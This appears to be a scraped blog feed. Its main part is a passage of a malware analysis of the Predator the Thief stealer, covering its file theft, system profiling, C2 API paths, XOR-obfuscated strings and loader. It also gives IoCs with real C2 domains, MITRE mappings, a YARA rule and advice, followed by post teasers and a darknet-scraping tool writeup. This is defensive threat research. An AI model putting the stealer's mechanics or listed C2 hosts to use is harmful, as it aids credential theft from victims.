Discord_Part1Discord_Part2Discord_Part3

Predator is inspecting multiple places…

This stealer is stealing data from 3 strategical folders :

  • Desktop
  • Downloads
  • Documents

Each time, the task will be the same, it will search 4 type of files with the help of GetFileAttributesA :

  • *.doc
  • *.docx
  • *.txt
  • *.log

When it matches, they have copied into a folder named “Files”.

Information.log

When tasks are done, the malware starts generating a summarize file, who contains some specific and sensitive data from the machine victim beside the file “Information.log”. For DFIR, this file is the artifact to identify the name of the malware because it contains the name and the specific version.

So first, it writes the Username of the user that has executed the payload, the computer name, and the OS Version.

User name: lolilol
Machine name: Computer 
OS version: Windoge 10

Then copy the content of the clipboard with the help of GetClipBoardData

Current clipboard: 
-------------- 
Omelette du fromage

Let’s continue the process…

Startup folder: C:\Users\lolilol\AppData\Local\Temp\predator.exe

Some classic specification about the machine is requested and saved into the file.

CPU info: Some bad CPU | Amount of kernels: 128 (Current CPU usage: 46.112917%) 
GPU info: Fumik0_ graphical display 
Amount of RAM: 12 GB (Current RAM usage: 240 MB) 
Screen resolution: 1900x1005

Then, all the user accounts are indicated

Computer users: 
lolilol 
Administrator 
All Users 
Default 
Default User 
Public

The last part is about some exotics information that is quite awkward in fact… Firstly, for some reasons that I don’t want to understand, there is the compile time hardcoded on the payload.

Compile Time

Then the second exotic data saved into Information.log is the grabbing execution time for stealing contents from the machine… This information could be useful for debugging some tweaks with the features.

Additional information:
Compile time: Aug 31 2018
Grabbing time: 0.359375 second(s)

C2 Communications

For finishing the information.log, a GET request is made for getting some network data about the victim…

First, it set up the request by uncovered some Data like :

  • A user-agent
  • The content-type

UA

  • The API URL ( /api/info.get )

We can have for example this result :

Amsterdam;Netherlands;52.3702;4.89517;51.15.43.205;Europe/Amsterdam;1012;

When the request is done, the data is consolidated step by step with the help of different loops and conditions.

GET01

When the task is done, there are saved into Information.log

City: Nopeland 
Country:  NopeCountry
Coordinates: XX.XXXX N, X.XXXX W 
IP: XXX.XXX.XXX.XXX 
Timezone: Nowhere 
Zip code: XXXXX

The Archive is not complete, it only needs for the stealer to send it to the C2.

zpar.zip

So now it set up some pieces of information into the gate.get request with specifics arguments, from p1 to p7, for example :

  • p1: Number of accounts stolen
  • p2: Number of cookies stolen
  • p4: Number of forms stolen
  • etc…

results :

Request

The POST request is now complete, the stealer will clean everything and quit.

Panel_C2_Example

Example of Predator C2 Panel with fancy background…

Update – v2.3.7

So during the analysis,  new versions were pushed… Currently (at the time where this post was redacted), the v3 has been released, but without possession of this specific version, I won’t talk anything about it and will me be focus only on the 2.3.7.

It’s useless to review from scratch, the mechanic of this stealer is still the same, just some tweak or other arrangements was done for multiple purposes… Without digging too much into it, let’s see some changes (not all) that I found interesting.

changelog

Changelog of v2.3.7 explained by the author

As usual, this is the same patterns :

  • Code optimizations (Faster / Lightweight)
  • More features…

As you can see v2.3.7 on the right is much longer than v2.3.5 (left), but the backbone is still the same.

Mutex

On 2.3.7,  A mutex is integrated with a specific string called “SyystemServs”

Xor / Obfuscated Strings

XOR_v2

During the C2 requests, URL arguments are generated byte per byte and unXOR.

For example :

push 04
...
push 61
...
push 70
...
leads to this 
HEX    : 046170692F676174652E6765743F70313D
STRING : .api/gate.get?p1=

This is basic and simple but enough to just slow down the review of the strings. but at least, it’s really easy to uncover it, so it doesn’t matter.

This tweak by far is why the code is much longer than v2.3.5.

Loader

Not seen before (as far I saw), it seems on 2.3.7, it integrates a loader feature to push another payload on the victim machine, easily recognizable with the adequate GET Request

/api/download.get

The API request permits to the malware to get an URL into text format. Then Download and saved it into disk and execute it with the help of ShellExecuteA

Loader

There also some other tweaks, but it’s unnecessary to detail on this review, I let you this task by yourself if you are curious 🙂

IoC

v2.3.5

  • 299f83d5a35f17aa97d40db667a52dcc | Sample Packed
  • 3cb386716d7b90b4dca1610afbd5b146 | Sample Unpacked
  • kent-adam.myjino.ru | C2 Domain

v2.3.7

  •  cbcc48fe0fa0fd30cb4c088fae582118 | Sample Unpacked
  •  denbaliberdin.myjino.ru | C2 Domain

HTTP Patterns

  • GET    –   /api/info.get
  • POST  –  /api//gate.get?p1=X&p2=X&p3=X&p4=X&p5=X&p6=X&p7=X
  • GET    –  /api/download.get

MITRE ATT&CK

v2.3.5

  • Discovery – Peripheral Device Discovery
  • Discovery – System Information Discovery
  • Discovery – System Time Discovery
  • Discovery – Query Registry
  • Credential Access – Credentials in Files
  • Exfiltration – Data Compressed

v2.3.7

  • Discovery – Peripheral Device Discovery
  • Discovery – System Information Discovery
  • Discovery – System Time Discovery
  • Discovery – Query Registry
  • Credential Access – Credentials in Files
  • Exfiltration – Data Compressed
  • Execution –  Execution through API

Author / Threat Actor

  • Alexuiop1337

Yara Rule

rule Predator_The_Thief : Predator_The_Thief {
    meta:
        description = "Yara rule for Predator The Thief v2.3.5 & +"
        author = "Fumik0_"
        date = "2018/10/12"
        update = "2018/12/19"

    strings:
        $mz = { 4D 5A }

        // V2
        $hex1 = { BF 00 00 40 06 } 
        $hex2 = { C6 04 31 6B }
        $hex3 = { C6 04 31 63 }
        $hex4 = { C6 04 31 75 }
        $hex5 = { C6 04 31 66 }
 
        $s1 = "sqlite_" ascii wide
 
        // V3
        $x1 = { C6 84 24 ?? ?? 00 00 8C } 
        $x2 = { C6 84 24 ?? ?? 00 00 1A }  
        $x3 = { C6 84 24 ?? ?? 00 00 D4 } 
        $x4 = { C6 84 24 ?? ?? 00 00 03 }  
        $x5 = { C6 84 24 ?? ?? 00 00 B4 } 
        $x6 = { C6 84 24 ?? ?? 00 00 80 }
 
    condition:
        $mz at 0 and 
        ( ( all of ($hex*) and all of ($s*) ) or (all of ($x*)))
}

 

Recommendations

  • Always running stuff inside a VM, be sure to install a lot of stuff linked to the hypervisor (like Guest Addons tools)  to trigger as much as possible all kind of possible Anti-VM detection and closing malware. When you have done with your activities stop the VM and restore it a Specific clean snapshot when it’s done.
  • Avoid storing files at a pre-destined path (Desktop, Documents, Downloads), put at a place that is not common.
  • Avoiding Cracks and other stupid fake hacks, stealers are usually behind the current game trendings (especially in those times with Fortnite…).
  • Use containers for software that you are using, this will reduce the risk of stealing data.
  • Flush your browser after each visit, never saved your passwords directly on your browser or using auto-fill features.
  • Don’t use the same password for all your websites (use 2FA and it’s possible), we are in 2018, and this still sadly everywhere like this.
  • Make some noise with your data, that will permit to lose some attacker minds to find some accurate values into the junk information.
  • Use a Vault Password software.
  • Troll/Not Troll: Learn Russian and put your keyboard in Cyrillic 🙂

Conclusion

Stealers are not sophisticated malware, but they are enough effective to make some irreversible damage for victims. Email accounts and other credentials are more and more impactful and this will be worse with the years. Behaviors must changes for the account management to limit this kind of scenario. Awareness and good practices are the keys and this will not be a simple security software solution that will solve everything.

Well for me I’ve enough work, it’s time to sleep a little…

Himouto Habits

#HappyHunting

Update 2018-10-23 : Yara Rules now working also for v3

Windows 10 x86/wow64 Userland heap

Introduction Hi all, Over the course of the past few weeks ago, I received a number of "emergency" calls from some relatives, asking me to look at their computer because "things were broken", "things looked different" and "I think my computer got hacked".  I quickly realized that their computers got upgraded to Windows 10. We […]

The post Windows 10 x86/wow64 Userland heap first appeared on Corelan Cybersecurity Research.

Crypto in the box, stone age edition

Introduction First of all, Happy New Year to everyone! I hope 2016 will be a fantastic and healthy year, filled with fun, joy, energy, and lots of pleasant surprises. I remember when all of my data would fit on a single floppy disk. 10 times. The first laptops looked like (and felt like) mainframes on […]

The post Crypto in the box, stone age edition first appeared on Corelan Cybersecurity Research.

Tivoli Madness

By: voidsec

TL; DR: this blog post serves as an advisory for both: CVE-2020-28054: An Authorization Bypass vulnerability affecting JamoDat – TSMManager Collector v. <= 6.5.0.21 A Stack Based Buffer Overflow affecting IBM Tivoli Storage Manager – ITSM Administrator Client Command Line Administrative Interface (dsmadmc.exe) Version 5, Release 2, Level 0.1. Unfortunately, after I had one of […]

The post Tivoli Madness appeared first on VoidSec.

Hunting Onions – A Framework for Simple Darknet Analysis

By: Joshua

Sevro Security
Hunting Onions – A Framework for Simple Darknet Analysis

One of the things I spend a-lot of time doing is researching the current threat landscape. I dedicate a-lot of time to pulling samples from Virus Total, reversing, analyzing, and searching for known/unknown IOC’s everywhere I can in order to properly mimic a threat actor. One of the places I search happens to be via Tor (AKA: the darknet). My method on how I connect to TOR varies and this post is not dedicated on how to stay safe and avoid data leakage. Rather, it’s to demonstrate a novel approach to obtaining .Onion address and analyzing them in a safe and efficient manner.

TL;DR: A full listing of classes and functions are detailed within the Github Wiki.


How Onion Hunter Works

NOTE: Onion Hunter does not download images, malware, full site source code, etc.. This is to protect the user and the system that is running the analysis. There’s a ton of bad things that can easily get you into trouble and for that reason alone, only the HTML of the page in question is analyzed and nothing more.


Onion-Hunter is a Python3 based framework that analyzes Onion site source code for user defined keywords and stores relevant data to a SQLite3 backend. Currently, the framework utilizes several sources to aggregate Onion addresses:

  • Reddit subreddits: A predefined set of subreddits are populated within the config.py. that are scraped for any Onion addresses.
  • Tor Deep Paste: This has turned out to be a very good source.
  • Fresh Onions Sources: Each onion address is analyzed to determine if it’s a fresh onion source (i.e., contains new/mapped onions) and if so, is saved to the FRESH_ONION_SOURCES table.
  • Additional_onions.txt: Any tertiary onion address, that is any address found that is not immediately analyzed, is saved to docs/additional_onions.txt for later analysis.

A researcher can also analyze individual or a text file filled with Onion address if they happen to come upon something interesting that warrants analysis and categorization.

Once valid .Onion addresses have been found, they’re analyzed by issuing a GET request to the .Onion address and searching the index source (HTML) for keywords that are per-defined by the researcher.

Onion Hunting Process

The Database

A SQLite3 backend is used to maintain records of all analyzed Onion addresses as well as a record of all Onions that have been categorized a probable Fresh Onion Domains. There are a total of three (3) tables that are used:

  1. ONIONS – Contains all Onion addresses observed and is by far, the most interesting table for analysis.
  2. FRESH_ONION_SOURCES – Any onion address that 50+ unique addresses listed on the front page and also include fresh onion keywords is categorized as a probable Fresh Onion Domain and saved to this table.
  3. KNOWN_ONIONS – This table is currently unused. It was designed for reporting purposes. That is, if for any reason you want to conduct analysis on weekly/monthly trends (for example) attributes of previously analyzed Onions can be added to this table and therefore avoid duplication is reporting.
CREATE TABLE ONIONS
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
DATE_FOUND TEXT NOT NULL,
DOMAIN_SOURCE TEXT NOT NULL,
URI TEXT NOT NULL,
URI_TITLE TEXT,
DOMAIN_HASH TEXT NOT NULL,
KEYWORD_MATCHES TEXT,
KEYWORD_MATCHES_SUM INT,
INDEX_SOURCE TEXT NOT NULL);

CREATE TABLE FRESH_ONION_SOURCES
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
URI TEXT NOT NULL,
DOMAIN_HASH TEXT NOT NULL,
FOREIGN KEY (DOMAIN_HASH) REFERENCES ONIONS (DOMAIN_HASH));

CREATE TABLE KNOWN_ONIONS
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
DOMAIN_HASH TEXT NOT NULL,
DATE_REPORTED TEXT,
REPORTED INT NOT NULL,
FOREIGN KEY (DOMAIN_HASH) REFERENCES ONIONS (DOMAIN_HASH));

An example of what the data looks like within the ONIONS table can be seen in the image below. For simply viewing the data, I like to used DB Browser for SQLite. However, all heavy operations should be done in code as this application can be very clunky.

Viewing the Onions table within DM browser

User Configuration

As stated above, the only method of domain/site analysis is by a simple keyword search. A user must supply the following within the src/config.py:

class configuration:

    def __init__(self):
        # Reddit API Variables
        self.r_username = ""
        self.r_password = ""
        self.r_client_id = ""
        self.r_client_secret = ""
        self.r_user_agent = ""

        # Reddit SubReddits to Search:
        self.sub_reddits = ["onions", "deepweb", "darknet", "tor", "conspiracy", "privacy", "vpn", "deepwebintel",
                            "emailprivacy", "drugs", "blackhat", "HowToHack", "netsec", "hacking",
                            "blackhatunderground", "blackhats", "blackhatting", "blackhatexploits",
                            "reverseengineering"]

        # Keywords to Search each Onions Address for.
        ## Searches the .onion source code retrieved via an HTTP GET request.
        self.keywords = ["Hacker", "Flawwedammy"]

Improvements

There are a lot of improvements that can be made to the current version and I intend on making some of these changes in 2020. For example, I would like to utilize duckduckgo API as well as Reddit to start the initial searching. There also may be reliable sources that keep tabs on Fresh Onion databases that are active on Tor. These information sources would be more reliable going forward.

Other improvements such as database optimization, site categorization, and user-defined analysis techniques are slotted as well.


Hunting Onions – A Framework for Simple Darknet Analysis
Joshua

❌